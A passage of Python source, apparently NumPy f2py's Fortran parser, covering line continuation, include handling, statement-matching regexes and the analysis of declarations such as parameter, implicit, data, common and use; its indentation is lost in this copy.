l, _ = split_by_unquoted(l + 4 * ' ' + rl[5:], '!')
if l.strip() == '': # Skip empty line
cont = 0
continue
if sourcecodeform == 'fix':
if l[0] in ['*', 'c', '!', 'C', '#']:
if l[1:5].lower() == 'f2py': # f2py directive
l = ' ' + l[5:]
else: # Skip comment line
cont = 0
continue
elif strictf77:
if len(l) > 72:
l = l[:72]
if not (l[0] in spacedigits):
raise Exception('readfortrancode: Found non-(space,digit) char '
'in the first column.\n\tAre you sure that '
'this code is in fix form?\n\tline=%s' % repr(l))
if (not cont or strictf77) and (len(l) > 5 and not l[5] == ' '):
# Continuation of a previous line
ll = ll + l[6:]
finalline = ''
origfinalline = ''
else:
if not strictf77:
# F90 continuation
r = cont1.match(l)
if r:
l = r.group('line') # Continuation follows ..
if cont:
ll = ll + cont2.match(l).group('line')
finalline = ''
origfinalline = ''
else:
# clean up line beginning from possible digits.
l = ' ' + l[5:]
if localdolowercase:
finalline = ll.lower()
else:
finalline = ll
origfinalline = ll
ll = l
cont = (r is not None)
else:
# clean up line beginning from possible digits.
l = ' ' + l[5:]
if localdolowercase:
finalline = ll.lower()
else:
finalline = ll
origfinalline = ll
ll = l
elif sourcecodeform == 'free':
if not cont and ext == '.pyf' and mline_mark.match(l):
l = l + '\n'
while True:
lc = fin.readline()
if not lc:
errmess(
'Unexpected end of file when reading multiline\n')
break
l = l + lc
if mline_mark.match(lc):
break
l = l.rstrip()
r = cont1.match(l)
if r:
l = r.group('line') # Continuation follows ..
if cont:
ll = ll + cont2.match(l).group('line')
finalline = ''
origfinalline = ''
else:
if localdolowercase:
finalline = ll.lower()
else:
finalline = ll
origfinalline = ll
ll = l
cont = (r is not None)
else:
raise ValueError(
"Flag sourcecodeform must be either 'fix' or 'free': %s" % repr(sourcecodeform))
filepositiontext = 'Line #%d in %s:"%s"\n\t' % (
fin.filelineno() - 1, currentfilename, l1)
m = includeline.match(origfinalline)
if m:
fn = m.group('name')
if os.path.isfile(fn):
readfortrancode(fn, dowithline=dowithline, istop=0)
else:
include_dirs = [
os.path.dirname(currentfilename)] + include_paths
foundfile = 0
for inc_dir in include_dirs:
fn1 = os.path.join(inc_dir, fn)
if os.path.isfile(fn1):
foundfile = 1
readfortrancode(fn1, dowithline=dowithline, istop=0)
break
if not foundfile:
outmess('readfortrancode: could not find include file %s in %s. Ignoring.\n' % (
repr(fn), os.pathsep.join(include_dirs)))
else:
dowithline(finalline)
l1 = ll
if localdolowercase:
finalline = ll.lower()
else:
finalline = ll
origfinalline = ll
filepositiontext = 'Line #%d in %s:"%s"\n\t' % (
fin.filelineno() - 1, currentfilename, l1)
m = includeline.match(origfinalline)
if m:
fn = m.group('name')
if os.path.isfile(fn):
readfortrancode(fn, dowithline=dowithline, istop=0)
else:
include_dirs = [os.path.dirname(currentfilename)] + include_paths
foundfile = 0
for inc_dir in include_dirs:
fn1 = os.path.join(inc_dir, fn)
if os.path.isfile(fn1):
foundfile = 1
readfortrancode(fn1, dowithline=dowithline, istop=0)
break
if not foundfile:
outmess('readfortrancode: could not find include file %s in %s. Ignoring.\n' % (
repr(fn), os.pathsep.join(include_dirs)))
else:
dowithline(finalline)
filepositiontext = ''
fin.close()
if istop:
dowithline('', 1)
else:
gotnextfile, filepositiontext, currentfilename, sourcecodeform, strictf77,\
beginpattern, quiet, verbose, dolowercase = saveglobals
# Crack line
beforethisafter = r'\s*(?P<before>%s(?=\s*(\b(%s)\b)))' + \
r'\s*(?P<this>(\b(%s)\b))' + \
r'\s*(?P<after>%s)\s*\Z'
##
fortrantypes = r'character|logical|integer|real|complex|double\s*(precision\s*(complex|)|complex)|type(?=\s*\([\w\s,=(*)]*\))|byte'
typespattern = re.compile(
beforethisafter % ('', fortrantypes, fortrantypes, '.*'), re.I), 'type'
typespattern4implicit = re.compile(beforethisafter % (
'', fortrantypes + '|static|automatic|undefined', fortrantypes + '|static|automatic|undefined', '.*'), re.I)
#
functionpattern = re.compile(beforethisafter % (
r'([a-z]+[\w\s(=*+-/)]*?|)', 'function', 'function', '.*'), re.I), 'begin'
subroutinepattern = re.compile(beforethisafter % (
r'[a-z\s]*?', 'subroutine', 'subroutine', '.*'), re.I), 'begin'
# modulepattern=re.compile(beforethisafter%('[a-z\s]*?','module','module','.*'),re.I),'begin'
#
groupbegins77 = r'program|block\s*data'
beginpattern77 = re.compile(
beforethisafter % ('', groupbegins77, groupbegins77, '.*'), re.I), 'begin'
groupbegins90 = groupbegins77 + \
r'|module(?!\s*procedure)|python\s*module|interface|type(?!\s*\()'
beginpattern90 = re.compile(
beforethisafter % ('', groupbegins90, groupbegins90, '.*'), re.I), 'begin'
groupends = (r'end|endprogram|endblockdata|endmodule|endpythonmodule|'
r'endinterface|endsubroutine|endfunction')
endpattern = re.compile(
beforethisafter % ('', groupends, groupends, r'[\w\s]*'), re.I), 'end'
# endifs='end\s*(if|do|where|select|while|forall)'
endifs = r'(end\s*(if|do|where|select|while|forall))|(module\s*procedure)'
endifpattern = re.compile(
beforethisafter % (r'[\w]*?', endifs, endifs, r'[\w\s]*'), re.I), 'endif'
#
implicitpattern = re.compile(
beforethisafter % ('', 'implicit', 'implicit', '.*'), re.I), 'implicit'
dimensionpattern = re.compile(beforethisafter % (
'', 'dimension|virtual', 'dimension|virtual', '.*'), re.I), 'dimension'
externalpattern = re.compile(
beforethisafter % ('', 'external', 'external', '.*'), re.I), 'external'
optionalpattern = re.compile(
beforethisafter % ('', 'optional', 'optional', '.*'), re.I), 'optional'
requiredpattern = re.compile(
beforethisafter % ('', 'required', 'required', '.*'), re.I), 'required'
publicpattern = re.compile(
beforethisafter % ('', 'public', 'public', '.*'), re.I), 'public'
privatepattern = re.compile(
beforethisafter % ('', 'private', 'private', '.*'), re.I), 'private'
intrinsicpattern = re.compile(
beforethisafter % ('', 'intrinsic', 'intrinsic', '.*'), re.I), 'intrinsic'
intentpattern = re.compile(beforethisafter % (
'', 'intent|depend|note|check', 'intent|depend|note|check', r'\s*\(.*?\).*'), re.I), 'intent'
parameterpattern = re.compile(
beforethisafter % ('', 'parameter', 'parameter', r'\s*\(.*'), re.I), 'parameter'
datapattern = re.compile(
beforethisafter % ('', 'data', 'data', '.*'), re.I), 'data'
callpattern = re.compile(
beforethisafter % ('', 'call', 'call', '.*'), re.I), 'call'
entrypattern = re.compile(
beforethisafter % ('', 'entry', 'entry', '.*'), re.I), 'entry'
callfunpattern = re.compile(
beforethisafter % ('', 'callfun', 'callfun', '.*'), re.I), 'callfun'
commonpattern = re.compile(
beforethisafter % ('', 'common', 'common', '.*'), re.I), 'common'
usepattern = re.compile(
beforethisafter % ('', 'use', 'use', '.*'), re.I), 'use'
containspattern = re.compile(
beforethisafter % ('', 'contains', 'contains', ''), re.I), 'contains'
formatpattern = re.compile(
beforethisafter % ('', 'format', 'format', '.*'), re.I), 'format'
# Non-fortran and f2py-specific statements
f2pyenhancementspattern = re.compile(beforethisafter % ('', 'threadsafe|fortranname|callstatement|callprotoargument|usercode|pymethoddef',
'threadsafe|fortranname|callstatement|callprotoargument|usercode|pymethoddef', '.*'), re.I | re.S), 'f2pyenhancements'
multilinepattern = re.compile(
r"\s*(?P<before>''')(?P<this>.*?)(?P<after>''')\s*\Z", re.S), 'multiline'
##
def split_by_unquoted(line, characters):
"""
Splits the line into (line[:i], line[i:]),
where i is the index of first occurrence of one of the characters
not within quotes, or len(line) if no such index exists
"""
assert not (set('"\'') & set(characters)), "cannot split by unquoted quotes"
r = re.compile(
r"\A(?P<before>({single_quoted}|{double_quoted}|{not_quoted})*)"
r"(?P<after>{char}.*)\Z".format(
not_quoted="[^\"'{}]".format(re.escape(characters)),
char="[{}]".format(re.escape(characters)),
single_quoted=r"('([^'\\]|(\\.))*')",
double_quoted=r'("([^"\\]|(\\.))*")'))
m = r.match(line)
if m:
d = m.groupdict()
return (d["before"], d["after"])
return (line, "")
def _simplifyargs(argsline):
a = []
for n in markoutercomma(argsline).split('@,@'):
for r in '(),':
n = n.replace(r, '_')
a.append(n)
return ','.join(a)
crackline_re_1 = re.compile(r'\s*(?P<result>\b[a-z]+[\w]*\b)\s*[=].*', re.I)
def crackline(line, reset=0):
"""
reset=-1 --- initialize
reset=0 --- crack the line
reset=1 --- final check if mismatch of blocks occurred
Cracked data is saved in grouplist[0].
"""
global beginpattern, groupcounter, groupname, groupcache, grouplist
global filepositiontext, currentfilename, neededmodule, expectbegin
global skipblocksuntil, skipemptyends, previous_context, gotnextfile
_, has_semicolon = split_by_unquoted(line, ";")
if has_semicolon and not (f2pyenhancementspattern[0].match(line) or
multilinepattern[0].match(line)):
# XXX: non-zero reset values need testing
assert reset == 0, repr(reset)
# split line on unquoted semicolons
line, semicolon_line = split_by_unquoted(line, ";")
while semicolon_line:
crackline(line, reset)
line, semicolon_line = split_by_unquoted(semicolon_line[1:], ";")
crackline(line, reset)
return
if reset < 0:
groupcounter = 0
groupname = {groupcounter: ''}
groupcache = {groupcounter: {}}
grouplist = {groupcounter: []}
groupcache[groupcounter]['body'] = []
groupcache[groupcounter]['vars'] = {}
groupcache[groupcounter]['block'] = ''
groupcache[groupcounter]['name'] = ''
neededmodule = -1
skipblocksuntil = -1
return
if reset > 0:
fl = 0
if f77modulename and neededmodule == groupcounter:
fl = 2
while groupcounter > fl:
outmess('crackline: groupcounter=%s groupname=%s\n' %
(repr(groupcounter), repr(groupname)))
outmess(
'crackline: Mismatch of blocks encountered. Trying to fix it by assuming "end" statement.\n')
grouplist[groupcounter - 1].append(groupcache[groupcounter])
grouplist[groupcounter - 1][-1]['body'] = grouplist[groupcounter]
del grouplist[groupcounter]
groupcounter = groupcounter - 1
if f77modulename and neededmodule == groupcounter:
grouplist[groupcounter - 1].append(groupcache[groupcounter])
grouplist[groupcounter - 1][-1]['body'] = grouplist[groupcounter]
del grouplist[groupcounter]
groupcounter = groupcounter - 1 # end interface
grouplist[groupcounter - 1].append(groupcache[groupcounter])
grouplist[groupcounter - 1][-1]['body'] = grouplist[groupcounter]
del grouplist[groupcounter]
groupcounter = groupcounter - 1 # end module
neededmodule = -1
return
if line == '':
return
flag = 0
for pat in [dimensionpattern, externalpattern, intentpattern, optionalpattern,
requiredpattern,
parameterpattern, datapattern, publicpattern, privatepattern,
intrinsicpattern,
endifpattern, endpattern,
formatpattern,
beginpattern, functionpattern, subroutinepattern,
implicitpattern, typespattern, commonpattern,
callpattern, usepattern, containspattern,
entrypattern,
f2pyenhancementspattern,
multilinepattern
]:
m = pat[0].match(line)
if m:
break
flag = flag + 1
if not m:
re_1 = crackline_re_1
if 0 <= skipblocksuntil <= groupcounter:
return
if 'externals' in groupcache[groupcounter]:
for name in groupcache[groupcounter]['externals']:
if name in invbadnames:
name = invbadnames[name]
if 'interfaced' in groupcache[groupcounter] and name in groupcache[groupcounter]['interfaced']:
continue
m1 = re.match(
r'(?P<before>[^"]*)\b%s\b\s*@\(@(?P<args>[^@]*)@\)@.*\Z' % name, markouterparen(line), re.I)
if m1:
m2 = re_1.match(m1.group('before'))
a = _simplifyargs(m1.group('args'))
if m2:
line = 'callfun %s(%s) result (%s)' % (
name, a, m2.group('result'))
else:
line = 'callfun %s(%s)' % (name, a)
m = callfunpattern[0].match(line)
if not m:
outmess(
'crackline: could not resolve function call for line=%s.\n' % repr(line))
return
analyzeline(m, 'callfun', line)
return
if verbose > 1 or (verbose == 1 and currentfilename.lower().endswith('.pyf')):
previous_context = None
outmess('crackline:%d: No pattern for line\n' % (groupcounter))
return
elif pat[1] == 'end':
if 0 <= skipblocksuntil < groupcounter:
groupcounter = groupcounter - 1
if skipblocksuntil <= groupcounter:
return
if groupcounter <= 0:
raise Exception('crackline: groupcounter(=%s) is nonpositive. '
'Check the blocks.'
% (groupcounter))
m1 = beginpattern[0].match((line))
if (m1) and (not m1.group('this') == groupname[groupcounter]):
raise Exception('crackline: End group %s does not match with '
'previous Begin group %s\n\t%s' %
(repr(m1.group('this')), repr(groupname[groupcounter]),
filepositiontext)
)
if skipblocksuntil == groupcounter:
skipblocksuntil = -1
grouplist[groupcounter - 1].append(groupcache[groupcounter])
grouplist[groupcounter - 1][-1]['body'] = grouplist[groupcounter]
del grouplist[groupcounter]
groupcounter = groupcounter - 1
if not skipemptyends:
expectbegin = 1
elif pat[1] == 'begin':
if 0 <= skipblocksuntil <= groupcounter:
groupcounter = groupcounter + 1
return
gotnextfile = 0
analyzeline(m, pat[1], line)
expectbegin = 0
elif pat[1] == 'endif':
pass
elif pat[1] == 'contains':
if ignorecontains:
return
if 0 <= skipblocksuntil <= groupcounter:
return
skipblocksuntil = groupcounter
else:
if 0 <= skipblocksuntil <= groupcounter:
return
analyzeline(m, pat[1], line)
def markouterparen(line):
l = ''
f = 0
for c in line:
if c == '(':
f = f + 1
if f == 1:
l = l + '@(@'
continue
elif c == ')':
f = f - 1
if f == 0:
l = l + '@)@'
continue
l = l + c
return l
def markoutercomma(line, comma=','):
l = ''
f = 0
before, after = split_by_unquoted(line, comma + '()')
l += before
while after:
if (after[0] == comma) and (f == 0):
l += '@' + comma + '@'
else:
l += after[0]
if after[0] == '(':
f += 1
elif after[0] == ')':
f -= 1
before, after = split_by_unquoted(after[1:], comma + '()')
l += before
assert not f, repr((f, line, l))
return l
def unmarkouterparen(line):
r = line.replace('@(@', '(').replace('@)@', ')')
return r
def appenddecl(decl, decl2, force=1):
if not decl:
decl = {}
if not decl2:
return decl
if decl is decl2:
return decl
for k in list(decl2.keys()):
if k == 'typespec':
if force or k not in decl:
decl[k] = decl2[k]
elif k == 'attrspec':
for l in decl2[k]:
decl = setattrspec(decl, l, force)
elif k == 'kindselector':
decl = setkindselector(decl, decl2[k], force)
elif k == 'charselector':
decl = setcharselector(decl, decl2[k], force)
elif k in ['=', 'typename']:
if force or k not in decl:
decl[k] = decl2[k]
elif k == 'note':
pass
elif k in ['intent', 'check', 'dimension', 'optional', 'required']:
errmess('appenddecl: "%s" not implemented.\n' % k)
else:
raise Exception('appenddecl: Unknown variable definition key:' +
str(k))
return decl
selectpattern = re.compile(
r'\s*(?P<this>(@\(@.*?@\)@|[*][\d*]+|[*]\s*@\(@.*?@\)@|))(?P<after>.*)\Z', re.I)
nameargspattern = re.compile(
r'\s*(?P<name>\b[\w$]+\b)\s*(@\(@\s*(?P<args>[\w\s,]*)\s*@\)@|)\s*((result(\s*@\(@\s*(?P<result>\b[\w$]+\b)\s*@\)@|))|(bind\s*@\(@\s*(?P<bind>.*)\s*@\)@))*\s*\Z', re.I)
callnameargspattern = re.compile(
r'\s*(?P<name>\b[\w$]+\b)\s*@\(@\s*(?P<args>.*)\s*@\)@\s*\Z', re.I)
real16pattern = re.compile(
r'([-+]?(?:\d+(?:\.\d*)?|\d*\.\d+))[dD]((?:[-+]?\d+)?)')
real8pattern = re.compile(
r'([-+]?((?:\d+(?:\.\d*)?|\d*\.\d+))[eE]((?:[-+]?\d+)?)|(\d+\.\d*))')
_intentcallbackpattern = re.compile(r'intent\s*\(.*?\bcallback\b', re.I)
def _is_intent_callback(vdecl):
for a in vdecl.get('attrspec', []):
if _intentcallbackpattern.match(a):
return 1
return 0
def _resolvenameargspattern(line):
line = markouterparen(line)
m1 = nameargspattern.match(line)
if m1:
return m1.group('name'), m1.group('args'), m1.group('result'), m1.group('bind')
m1 = callnameargspattern.match(line)
if m1:
return m1.group('name'), m1.group('args'), None, None
return None, [], None, None
def analyzeline(m, case, line):
global groupcounter, groupname, groupcache, grouplist, filepositiontext
global currentfilename, f77modulename, neededinterface, neededmodule
global expectbegin, gotnextfile, previous_context
block = m.group('this')
if case != 'multiline':
previous_context = None
if expectbegin and case not in ['begin', 'call', 'callfun', 'type'] \
and not skipemptyends and groupcounter < 1:
newname = os.path.basename(currentfilename).split('.')[0]
outmess(
'analyzeline: no group yet. Creating program group with name "%s".\n' % newname)
gotnextfile = 0
groupcounter = groupcounter + 1
groupname[groupcounter] = 'program'
groupcache[groupcounter] = {}
grouplist[groupcounter] = []
groupcache[groupcounter]['body'] = []
groupcache[groupcounter]['vars'] = {}
groupcache[groupcounter]['block'] = 'program'
groupcache[groupcounter]['name'] = newname
groupcache[groupcounter]['from'] = 'fromsky'
expectbegin = 0
if case in ['begin', 'call', 'callfun']:
# Crack line => block,name,args,result
block = block.lower()
if re.match(r'block\s*data', block, re.I):
block = 'block data'
if re.match(r'python\s*module', block, re.I):
block = 'python module'
name, args, result, bind = _resolvenameargspattern(m.group('after'))
if name is None:
if block == 'block data':
name = '_BLOCK_DATA_'
else:
name = ''
if block not in ['interface', 'block data']:
outmess('analyzeline: No name/args pattern found for line.\n')
previous_context = (block, name, groupcounter)
if args:
args = rmbadname([x.strip()
for x in markoutercomma(args).split('@,@')])
else:
args = []
if '' in args:
while '' in args:
args.remove('')
outmess(
'analyzeline: argument list is malformed (missing argument).\n')
# end of crack line => block,name,args,result
needmodule = 0
needinterface = 0
if case in ['call', 'callfun']:
needinterface = 1
if 'args' not in groupcache[groupcounter]:
return
if name not in groupcache[groupcounter]['args']:
return
for it in grouplist[groupcounter]:
if it['name'] == name:
return
if name in groupcache[groupcounter]['interfaced']:
return
block = {'call': 'subroutine', 'callfun': 'function'}[case]
if f77modulename and neededmodule == -1 and groupcounter <= 1:
neededmodule = groupcounter + 2
needmodule = 1
if block != 'interface':
needinterface = 1
# Create new block(s)
groupcounter = groupcounter + 1
groupcache[groupcounter] = {}
grouplist[groupcounter] = []
if needmodule:
if verbose > 1:
outmess('analyzeline: Creating module block %s\n' %
repr(f77modulename), 0)
groupname[groupcounter] = 'module'
groupcache[groupcounter]['block'] = 'python module'
groupcache[groupcounter]['name'] = f77modulename
groupcache[groupcounter]['from'] = ''
groupcache[groupcounter]['body'] = []
groupcache[groupcounter]['externals'] = []
groupcache[groupcounter]['interfaced'] = []
groupcache[groupcounter]['vars'] = {}
groupcounter = groupcounter + 1
groupcache[groupcounter] = {}
grouplist[groupcounter] = []
if needinterface:
if verbose > 1:
outmess('analyzeline: Creating additional interface block (groupcounter=%s).\n' % (
groupcounter), 0)
groupname[groupcounter] = 'interface'
groupcache[groupcounter]['block'] = 'interface'
groupcache[groupcounter]['name'] = 'unknown_interface'
groupcache[groupcounter]['from'] = '%s:%s' % (
groupcache[groupcounter - 1]['from'], groupcache[groupcounter - 1]['name'])
groupcache[groupcounter]['body'] = []
groupcache[groupcounter]['externals'] = []
groupcache[groupcounter]['interfaced'] = []
groupcache[groupcounter]['vars'] = {}
groupcounter = groupcounter + 1
groupcache[groupcounter] = {}
grouplist[groupcounter] = []
groupname[groupcounter] = block
groupcache[groupcounter]['block'] = block
if not name:
name = 'unknown_' + block
groupcache[groupcounter]['prefix'] = m.group('before')
groupcache[groupcounter]['name'] = rmbadname1(name)
groupcache[groupcounter]['result'] = result
if groupcounter == 1:
groupcache[groupcounter]['from'] = currentfilename
else:
if f77modulename and groupcounter == 3:
groupcache[groupcounter]['from'] = '%s:%s' % (
groupcache[groupcounter - 1]['from'], currentfilename)
else:
groupcache[groupcounter]['from'] = '%s:%s' % (
groupcache[groupcounter - 1]['from'], groupcache[groupcounter - 1]['name'])
for k in list(groupcache[groupcounter].keys()):
if not groupcache[groupcounter][k]:
del groupcache[groupcounter][k]
groupcache[groupcounter]['args'] = args
groupcache[groupcounter]['body'] = []
groupcache[groupcounter]['externals'] = []
groupcache[groupcounter]['interfaced'] = []
groupcache[groupcounter]['vars'] = {}
groupcache[groupcounter]['entry'] = {}
# end of creation
if block == 'type':
groupcache[groupcounter]['varnames'] = []
if case in ['call', 'callfun']: # set parents variables
if name not in groupcache[groupcounter - 2]['externals']:
groupcache[groupcounter - 2]['externals'].append(name)
groupcache[groupcounter]['vars'] = copy.deepcopy(
groupcache[groupcounter - 2]['vars'])
try:
del groupcache[groupcounter]['vars'][name][
groupcache[groupcounter]['vars'][name]['attrspec'].index('external')]
except Exception:
pass
if block in ['function', 'subroutine']: # set global attributes
try:
groupcache[groupcounter]['vars'][name] = appenddecl(
groupcache[groupcounter]['vars'][name], groupcache[groupcounter - 2]['vars'][''])
except Exception:
pass
if case == 'callfun': # return type
if result and result in groupcache[groupcounter]['vars']:
if not name == result:
groupcache[groupcounter]['vars'][name] = appenddecl(
groupcache[groupcounter]['vars'][name], groupcache[groupcounter]['vars'][result])
# if groupcounter>1: # name is interfaced
try:
groupcache[groupcounter - 2]['interfaced'].append(name)
except Exception:
pass
if block == 'function':
t = typespattern[0].match(m.group('before') + ' ' + name)
if t:
typespec, selector, attr, edecl = cracktypespec0(
t.group('this'), t.group('after'))
updatevars(typespec, selector, attr, edecl)
if case in ['call', 'callfun']:
grouplist[groupcounter - 1].append(groupcache[groupcounter])
grouplist[groupcounter - 1][-1]['body'] = grouplist[groupcounter]
del grouplist[groupcounter]
groupcounter = groupcounter - 1 # end routine
grouplist[groupcounter - 1].append(groupcache[groupcounter])
grouplist[groupcounter - 1][-1]['body'] = grouplist[groupcounter]
del grouplist[groupcounter]
groupcounter = groupcounter - 1 # end interface
elif case == 'entry':
name, args, result, bind = _resolvenameargspattern(m.group('after'))
if name is not None:
if args:
args = rmbadname([x.strip()
for x in markoutercomma(args).split('@,@')])
else:
args = []
assert result is None, repr(result)
groupcache[groupcounter]['entry'][name] = args
previous_context = ('entry', name, groupcounter)
elif case == 'type':
typespec, selector, attr, edecl = cracktypespec0(
block, m.group('after'))
last_name = updatevars(typespec, selector, attr, edecl)
if last_name is not None:
previous_context = ('variable', last_name, groupcounter)
elif case in ['dimension', 'intent', 'optional', 'required', 'external', 'public', 'private', 'intrinsic']:
edecl = groupcache[groupcounter]['vars']
ll = m.group('after').strip()
i = ll.find('::')
if i < 0 and case == 'intent':
i = markouterparen(ll).find('@)@') - 2
ll = ll[:i + 1] + '::' + ll[i + 1:]
i = ll.find('::')
if ll[i:] == '::' and 'args' in groupcache[groupcounter]:
outmess('All arguments will have attribute %s%s\n' %
(m.group('this'), ll[:i]))
ll = ll + ','.join(groupcache[groupcounter]['args'])
if i < 0:
i = 0
pl = ''
else:
pl = ll[:i].strip()
ll = ll[i + 2:]
ch = markoutercomma(pl).split('@,@')
if len(ch) > 1:
pl = ch[0]
outmess('analyzeline: cannot handle multiple attributes without type specification. Ignoring %r.\n' % (
','.join(ch[1:])))
last_name = None
for e in [x.strip() for x in markoutercomma(ll).split('@,@')]:
m1 = namepattern.match(e)
if not m1:
if case in ['public', 'private']:
k = ''
else:
print(m.groupdict())
outmess('analyzeline: no name pattern found in %s statement for %s. Skipping.\n' % (
case, repr(e)))
continue
else:
k = rmbadname1(m1.group('name'))
if k not in edecl:
edecl[k] = {}
if case == 'dimension':
ap = case + m1.group('after')
if case == 'intent':
ap = m.group('this') + pl
if _intentcallbackpattern.match(ap):
if k not in groupcache[groupcounter]['args']:
if groupcounter > 1:
if '__user__' not in groupcache[groupcounter - 2]['name']:
outmess(
'analyzeline: missing __user__ module (could be nothing)\n')
# fixes ticket 1693
if k != groupcache[groupcounter]['name']:
outmess('analyzeline: appending intent(callback) %s'
' to %s arguments\n' % (k, groupcache[groupcounter]['name']))
groupcache[groupcounter]['args'].append(k)
else:
errmess(
'analyzeline: intent(callback) %s is ignored' % (k))
else:
errmess('analyzeline: intent(callback) %s is already'
' in argument list' % (k))
if case in ['optional', 'required', 'public', 'external', 'private', 'intrinsic']:
ap = case
if 'attrspec' in edecl[k]:
edecl[k]['attrspec'].append(ap)
else:
edecl[k]['attrspec'] = [ap]
if case == 'external':
if groupcache[groupcounter]['block'] == 'program':
outmess('analyzeline: ignoring program arguments\n')
continue
if k not in groupcache[groupcounter]['args']:
continue
if 'externals' not in groupcache[groupcounter]:
groupcache[groupcounter]['externals'] = []
groupcache[groupcounter]['externals'].append(k)
last_name = k
groupcache[groupcounter]['vars'] = edecl
if last_name is not None:
previous_context = ('variable', last_name, groupcounter)
elif case == 'parameter':
edecl = groupcache[groupcounter]['vars']
ll = m.group('after').strip()[1:-1]
last_name = None
for e in markoutercomma(ll).split('@,@'):
try:
k, initexpr = [x.strip() for x in e.split('=')]
except Exception:
outmess(
'analyzeline: could not extract name,expr in parameter statement "%s" of "%s"\n' % (e, ll))
continue
params = get_parameters(edecl)
k = rmbadname1(k)
if k not in edecl:
edecl[k] = {}
if '=' in edecl[k] and (not edecl[k]['='] == initexpr):
outmess('analyzeline: Overwriting the value of parameter "%s" ("%s") with "%s".\n' % (
k, edecl[k]['='], initexpr))
t = determineexprtype(initexpr, params)
if t:
if t.get('typespec') == 'real':
tt = list(initexpr)
for m in real16pattern.finditer(initexpr):
tt[m.start():m.end()] = list(
initexpr[m.start():m.end()].lower().replace('d', 'e'))
initexpr = ''.join(tt)
elif t.get('typespec') == 'complex':
initexpr = initexpr[1:].lower().replace('d', 'e').\
replace(',', '+1j*(')
try:
v = eval(initexpr, {}, params)
except (SyntaxError, NameError, TypeError) as msg:
errmess('analyzeline: Failed to evaluate %r. Ignoring: %s\n'
% (initexpr, msg))
continue
edecl[k]['='] = repr(v)
if 'attrspec' in edecl[k]:
edecl[k]['attrspec'].append('parameter')
else:
edecl[k]['attrspec'] = ['parameter']
last_name = k
groupcache[groupcounter]['vars'] = edecl
if last_name is not None:
previous_context = ('variable', last_name, groupcounter)
elif case == 'implicit':
if m.group('after').strip().lower() == 'none':
groupcache[groupcounter]['implicit'] = None
elif m.group('after'):
if 'implicit' in groupcache[groupcounter]:
impl = groupcache[groupcounter]['implicit']
else:
impl = {}
if impl is None:
outmess(
'analyzeline: Overwriting earlier "implicit none" statement.\n')
impl = {}
for e in markoutercomma(m.group('after')).split('@,@'):
decl = {}
m1 = re.match(
r'\s*(?P<this>.*?)\s*(\(\s*(?P<after>[a-z-, ]+)\s*\)\s*|)\Z', e, re.I)
if not m1:
outmess(
'analyzeline: could not extract info of implicit statement part "%s"\n' % (e))
continue
m2 = typespattern4implicit.match(m1.group('this'))
if not m2:
outmess(
'analyzeline: could not extract types pattern of implicit statement part "%s"\n' % (e))
continue
typespec, selector, attr, edecl = cracktypespec0(
m2.group('this'), m2.group('after'))
kindselect, charselect, typename = cracktypespec(
typespec, selector)
decl['typespec'] = typespec
decl['kindselector'] = kindselect
decl['charselector'] = charselect
decl['typename'] = typename
for k in list(decl.keys()):
if not decl[k]:
del decl[k]
for r in markoutercomma(m1.group('after')).split('@,@'):
if '-' in r:
try:
begc, endc = [x.strip() for x in r.split('-')]
except Exception:
outmess(
'analyzeline: expected "<char>-<char>" instead of "%s" in range list of implicit statement\n' % r)
continue
else:
begc = endc = r.strip()
if not len(begc) == len(endc) == 1:
outmess(
'analyzeline: expected "<char>-<char>" instead of "%s" in range list of implicit statement (2)\n' % r)
continue
for o in range(ord(begc), ord(endc) + 1):
impl[chr(o)] = decl
groupcache[groupcounter]['implicit'] = impl
elif case == 'data':
ll = []
dl = ''
il = ''
f = 0
fc = 1
inp = 0
for c in m.group('after'):
if not inp:
if c == "'":
fc = not fc
if c == '/' and fc:
f = f + 1
continue
if c == '(':
inp = inp + 1
elif c == ')':
inp = inp - 1
if f == 0:
dl = dl + c
elif f == 1:
il = il + c
elif f == 2:
dl = dl.strip()
if dl.startswith(','):
dl = dl[1:].strip()
ll.append([dl, il])
dl = c
il = ''
f = 0
if f == 2:
dl = dl.strip()
if dl.startswith(','):
dl = dl[1:].strip()
ll.append([dl, il])
vars = {}
if 'vars' in groupcache[groupcounter]:
vars = groupcache[groupcounter]['vars']
last_name = None
for l in ll:
l = [x.strip() for x in l]
if l[0][0] == ',':
l[0] = l[0][1:]
if l[0][0] == '(':
outmess(
'analyzeline: implied-DO list "%s" is not supported. Skipping.\n' % l[0])
continue
i = 0
j = 0
llen = len(l[1])
for v in rmbadname([x.strip() for x in markoutercomma(l[0]).split('@,@')]):
if v[0] == '(':
outmess(
'analyzeline: implied-DO list "%s" is not supported. Skipping.\n' % v)
# XXX: subsequent init expressions may get wrong values.
# Ignoring since data statements are irrelevant for
# wrapping.
continue
fc = 0
while (i < llen) and (fc or not l[1][i] == ','):
if l[1][i] == "'":
fc = not fc
i = i + 1
i = i + 1
if v not in vars:
vars[v] = {}
if '=' in vars[v] and not vars[v]['='] == l[1][j:i - 1]:
outmess('analyzeline: changing init expression of "%s" ("%s") to "%s"\n' % (
v, vars[v]['='], l[1][j:i - 1]))
vars[v]['='] = l[1][j:i - 1]
j = i
last_name = v
groupcache[groupcounter]['vars'] = vars
if last_name is not None:
previous_context = ('variable', last_name, groupcounter)
elif case == 'common':
line = m.group('after').strip()
if not line[0] == '/':
line = '//' + line
cl = []
f = 0
bn = ''
ol = ''
for c in line:
if c == '/':
f = f + 1
continue
if f >= 3:
bn = bn.strip()
if not bn:
bn = '_BLNK_'
cl.append([bn, ol])
f = f - 2
bn = ''
ol = ''
if f % 2:
bn = bn + c
else:
ol = ol + c
bn = bn.strip()
if not bn:
bn = '_BLNK_'
cl.append([bn, ol])
commonkey = {}
if 'common' in groupcache[groupcounter]:
commonkey = groupcache[groupcounter]['common']
for c in cl:
if c[0] not in commonkey:
commonkey[c[0]] = []
for i in [x.strip() for x in markoutercomma(c[1]).split('@,@')]:
if i:
commonkey[c[0]].append(i)
groupcache[groupcounter]['common'] = commonkey
previous_context = ('common', bn, groupcounter)
elif case == 'use':
m1 = re.match(
r'\A\s*(?P<name>\b[\w]+\b)\s*((,(\s*\bonly\b\s*:|(?P<notonly>))\s*(?P<list>.*))|)\s*\Z', m.group('after'), re.I)
if m1:
mm = m1.groupdict()
if 'use' not in groupcache[groupcounter]:
groupcache[groupcounter]['use'] = {}
name = m1.group('name')
groupcache[groupcounter]['use'][name] = {}
isonly = 0
if 'list' in mm and mm['list'] is not None:
if 'notonly' in mm and mm['notonly'] is None:
isonly = 1
groupcache[groupcounter]['use'][name]['only'] = isonly
ll = [x.strip() for x in mm['list'].split(',')]
rl = {}
for l in ll:
if '=' in l:
